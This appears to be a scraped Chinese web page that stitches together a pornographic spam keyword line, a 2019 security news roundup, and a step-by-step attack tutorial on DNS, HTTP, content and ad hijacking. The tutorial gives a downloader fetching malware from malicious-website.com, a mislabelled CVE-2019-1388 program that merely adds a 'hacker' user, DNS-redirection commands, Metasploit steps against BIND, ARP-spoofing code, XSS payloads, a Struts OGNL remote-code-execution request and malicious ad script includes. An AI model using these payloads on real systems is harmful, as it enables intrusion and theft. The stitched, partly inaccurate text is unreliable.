操屁眼的视频在线免费看,日本在线综合一区二区,久久在线观看免费视频,欧美日韩精品久久综

新聞資訊

    為了保護您的升級體驗,我們已經禁止在設備上使用此高通驅動程序的用戶升級到 Windows 10 版本1903,直到安裝了更新的驅動程序。”

    微軟最近承認了另一個有關 Windows 10 May 2019 更新的問題,但幸運的是,用戶實際上可以很容易地解決它。具體表現在 Windows 10 2019 年 5 月更新或版本 1903 會因為舊的高通驅動程序而遭遇 Wi-Fi 連接丟失。微軟沒有提供問題驅動程序的詳細信息,但表示已經解決問題并提供更新后的驅動程序,建議用戶盡快獲取它。

    “由于過時的高通驅動程序,一些較舊的計算機可能會失去 Wi-Fi 連接。應該可以從您的設備制造商(OEM)獲得更新的 Wi-Fi 驅動程序。”微軟解釋道。

    “為了保護您的升級體驗,我們已經禁止在設備上使用此高通驅動程序的用戶升級到 Windows 10 版本1903,直到安裝了更新的驅動程序。”

    雖然用戶可以選擇使用 Media Creation Tool 手動安裝May更新,但微軟建議不要使用此方法,除非部署了新的驅動程序。

    來源:cnBeta.COM

    更多資訊

    Android Q 設備重啟不斷:谷歌證實將盡快修復如果你升級到 Android Q 第三個測試版的話,那么最近是不是被設備不斷重啟搞崩潰了,事實上也確實如此,因為有很多用戶都遇到了類似的情況,大家吐槽谷歌的聲音越來越大。不少用戶發現,自己設備升級至 Android Q Beta 3 之后,設備市場會發生重啟,而且重啟的狀態沒有任何預警,讓人猝不及防。

    來源: 快科技

    詳情: http://t.cn/AiKxGumo

    人民日報追蹤瀏覽器主頁劫持:我的主頁我做主連日來,本報持續跟蹤報道“瀏覽器主頁劫持”現象,在網民中引發廣泛共鳴。大家紛紛留言,吐露心聲,揭露各種網絡侵權行為,呼吁主管部門加強監管,督促相關企業嚴守底線,期盼進一步凈化網絡生態,實現“我的主頁我做主”。

    來源: 人民日報

    詳情: http://t.cn/AiKxqj8W

    歐盟當局查封比特幣混幣服務商 Bestmixer.io 網站荷蘭金融刑事調查局在涉及歐洲刑警組織和其他當局的聯合行動中關閉了比特幣混幣服務商 Bestmixer.io 的網站。歐洲刑警組織在周三的一份聲明中表示,繼去年夏天開始相關調查之后,警方查封了 Bestmixer.io,稱其為 “針對加密混幣服務商的首次執法行動” 。

    來源: cnBeta.COM

    詳情: http://t.cn/AiKxqQWW

    Canva 1.39 億用戶數據泄露自稱 GnosticPlayers 的黑客聲稱竊取了澳大利亞網站 Canva 的 1.39 億用戶數據。Canva 是一個非常受歡迎的平面設計服務,Alexa 排名在 200 以內。黑客竊取的數據包括了用戶名字、真名 、電郵地址、城市國家信息,其中 6100 萬用戶有哈希密碼,其他用戶的信息還有用于登錄的 Google 令牌。

    來源: solidot.org

    詳情: http://t.cn/AiKxqrEp

    (信息來源于網絡,安華金和搜集整理)

    點擊“了解更多”可訪問文內鏈接

    僅供學習研究交流使用,切勿用于違法犯罪,為維護網絡安全做貢獻!

    一、DNS劫持

    1. 修改本地DNS設置

    步驟一:物理訪問或惡意軟件感染

    惡意軟件感染

    • 攻擊者通過釣魚郵件或惡意網站誘導用戶下載并運行惡意軟件。

    python

    復制代碼

    # 示例Python代碼,惡意軟件偽裝成合法軟件 import os def download_payload(): # 下載惡意軟件 os.system("curl -O http://malicious-website.com/malware.exe") def execute_payload(): # 執行下載的惡意軟件 os.system("malware.exe") download_payload() execute_payload()

    步驟二:獲取管理員權限

    提權方法

    • 惡意軟件利用系統漏洞提升權限,例如通過Windows UAC繞過或使用已知的提權漏洞。

    示例漏洞:CVE-2019-1388

    • CVE-2019-1388是一個Windows UAC繞過漏洞,攻擊者可以通過偽造的簽名窗口提升權限。

    利用示例

    1. 創建惡意文件

    c

    復制代碼

    // Exploit.c: 利用CVE-2019-1388的UAC繞過漏洞 #include <windows.h> #include <stdio.h> int main() { SHELLEXECUTEINFO shExecInfo; shExecInfo.cbSize=sizeof(SHELLEXECUTEINFO); shExecInfo.fMask=SEE_MASK_NOCLOSEPROCESS; shExecInfo.hwnd=NULL; shExecInfo.lpVerb="runas"; // 請求管理員權限 shExecInfo.lpFile="cmd.exe"; // 要運行的程序 shExecInfo.lpParameters="/c net user hacker Password123! /add"; // 創建新用戶 shExecInfo.lpDirectory=NULL; shExecInfo.nShow=SW_SHOWNORMAL; shExecInfo.hInstApp=NULL; ShellExecuteEx(&shExecInfo); WaitForSingleObject(shExecInfo.hProcess, INFINITE); CloseHandle(shExecInfo.hProcess); return 0; }

    1. 編譯并運行惡意文件

    shell

    復制代碼

    gcc Exploit.c -o Exploit.exe Exploit.exe

    步驟三:修改DNS設置

    使用命令提示符

    shell

    復制代碼

    # 修改DNS設置,將DNS服務器地址更改為攻擊者控制的DNS服務器 netsh interface ip set dns name="Local Area Connection" static 203.0.113.5

    修改注冊表

    shell

    復制代碼

    # 示例命令,修改注冊表中的DNS設置 reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{interface-ID}" /v NameServer /t REG_SZ /d 203.0.113.5 /f

    步驟四:DNS解析劫持

    • 當用戶訪問合法域名時,DNS請求被發送到攻擊者控制的DNS服務器,返回偽造的IP地址,重定向用戶到惡意網站。

    2. 攻擊DNS服務器

    步驟一:識別目標DNS服務器

    • 使用工具如nslookup、whois或dig來識別DNS服務器的IP地址和相關信息。

    shell

    復制代碼

    # 使用nslookup識別DNS服務器 nslookup example.com

    步驟二:漏洞利用或暴力破解

    • 利用DNS服務器軟件的已知漏洞,例如BIND DNS服務器中的漏洞CVE-2020-8617,或通過暴力破解獲取管理員權限。

    shell

    復制代碼

    # 使用Metasploit框架利用BIND DNS漏洞 use exploit/linux/misc/bind_tkey set RHOSTS <target_ip> set LHOST <your_ip> exploit

    步驟三:篡改DNS解析記錄

    • 登錄DNS服務器的管理界面,修改DNS解析記錄,將合法域名解析為惡意IP地址。

    shell

    復制代碼

    # 例如,在BIND DNS服務器中修改zone文件 vi /etc/bind/named.conf.local # 添加或修改解析記錄 zone "example.com" { type master; file "/etc/bind/db.example.com"; };

    步驟四:劫持用戶請求

    • 所有請求該DNS服務器解析域名的用戶都會被重定向到惡意網站。

    二、HTTP劫持

    中間人攻擊(MITM)

    步驟一:建立中間人位置

    ARP欺騙

    python

    復制代碼

    # 使用scapy庫進行ARP欺騙 from scapy.all import ARP, send def arp_poison(target_ip, target_mac, spoof_ip): arp_response=ARP(pdst=target_ip, hwdst=target_mac, psrc=spoof_ip, op='is-at') send(arp_response, verbose=0) # 示例:將目標IP的網關MAC地址更改為攻擊者的MAC地址 arp_poison('192.168.1.10', '00:11:22:33:44:55', '192.168.1.1')

    步驟二:攔截HTTP請求

    捕獲HTTP流量

    shell

    復制代碼

    # 使用Wireshark或tcpdump捕獲HTTP流量 tcpdump -i eth0 -w capture.pcap 'tcp port 80'

    步驟三:篡改HTTP響應

    使用Burp Suite攔截并修改HTTP響應

    • 在Burp Suite中設置攔截規則,攔截HTTP響應并插入惡意代碼。

    html

    復制代碼

    <!-- 插入惡意JavaScript代碼的示例 --> <script>alert('This site is hacked');</script>

    步驟四:執行惡意代碼

    • 用戶瀏覽器接收并執行篡改后的HTTP響應,執行其中的惡意代碼。

    三、內容注入

    XSS(跨站腳本)攻擊

    步驟一:發現注入點

    • 攻擊者在論壇、評論區或其他用戶輸入區域進行測試,尋找可以插入JavaScript代碼的注入點。

    步驟二:構造惡意代碼

    html

    復制代碼

    <!-- 示例:構造包含惡意JavaScript代碼的輸入 --> <script>alert('XSS');</script>

    步驟三:注入惡意代碼

    • 攻擊者將惡意代碼輸入到注入點,提交表單或發布評論。

    步驟四:執行惡意代碼

    • 服務器未對輸入進行適當過濾,直接返回包含惡意代碼的響應。用戶瀏覽器執行惡意代碼,攻擊者實現控制。

    四、廣告劫持

    劫持第三方廣告網絡

    步驟一:識別目標廣告網絡

    • 攻擊者通過分析廣告腳本和網絡流量,確定廣告網絡的來源和結構。

    javascript

    復制代碼

    // 分析廣告腳本 console.log(document.querySelectorAll('script[src*="adnetwork.com"]'));

    步驟二:漏洞利用或社會工程學

    • 利用廣告網絡的漏洞或通過社會工程學手段獲取廣告網絡管理權限。

    示例漏洞:CVE-2018-11776

    • 這是一個Apache Struts的遠程代碼執行漏洞,攻擊者可以通過特定的輸入導致遠程代碼執行。

    利用示例

    1. 創建惡意請求

    http

    復制代碼

    POST /struts2-rest-showcase/orders HTTP/1.1 Host: target.com Content-Type: application/x-www-form-urlencoded Content-Length: 100 %{(#_='multipart/form-data').(#dm=@ognl.OgnlContext@DEFAULT_MEMBER_ACCESS).(#_memberAccess=#dm).(#cmd='id').(#iswin=(@java.lang.System@getProperty('os.name').toLowerCase().contains('win'))).(#cmds=(#iswin?{'cmd.exe','/c',#cmd}:{'/bin/sh','-c',#cmd})).(#p=new java.lang.ProcessBuilder(#cmds)).(#p.redirectErrorStream(true)).(#process=#p.start()).(#ros=(@org.apache.struts2.ServletActionContext@getResponse().getOutputStream())).(@org.apache.commons.io.IOUtils@copy(#process.getInputStream(),#ros)).(#ros.flush())}

    1. 發送惡意請求
    • 使用工具如curl或Burp Suite發送惡意請求,觸發漏洞。

    步驟三:替換廣告內容

    • 攻擊者登錄廣告網絡管理界面,將合法廣告替換為惡意廣告,內容包括惡意JavaScript代碼或重定向鏈接。

    html

    復制代碼

    <!-- 替換廣告內容為惡意廣告 --> <script src="http://malicious-website.com/malicious.js"></script>

    步驟四:加載惡意廣告

    • 用戶瀏覽包含被劫持廣告的網頁時,惡意廣告加載并執行,其中的惡意代碼或重定向鏈接開始運行。

    html

    復制代碼

    <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <title>Ad Page</title> </head> <body> <h1>Welcome to the Ad Page</h1> <!-- 惡意廣告加載 --> <script src="http://malicious-website.com/malicious.js"></script> </body> </html>

    結論

    通過詳細的步驟和代碼示例,我們可以更清楚地了解DNS劫持、HTTP劫持、內容注入和廣告劫持的實現方式。這些攻擊手段對用戶和網絡安全構成嚴重威脅,但通過了解其原理和實現細節,我們可以采取更有效的防護措施,保護我們的網絡環境和數據安全。如果你有任何問題或想法,請在評論區分享,我們一起探討。

網站首頁   |    關于我們   |    公司新聞   |    產品方案   |    用戶案例   |    售后服務   |    合作伙伴   |    人才招聘   |   

友情鏈接: 餐飲加盟

地址:北京市海淀區    電話:010-     郵箱:@126.com

備案號:冀ICP備2024067069號-3 北京科技有限公司版權所有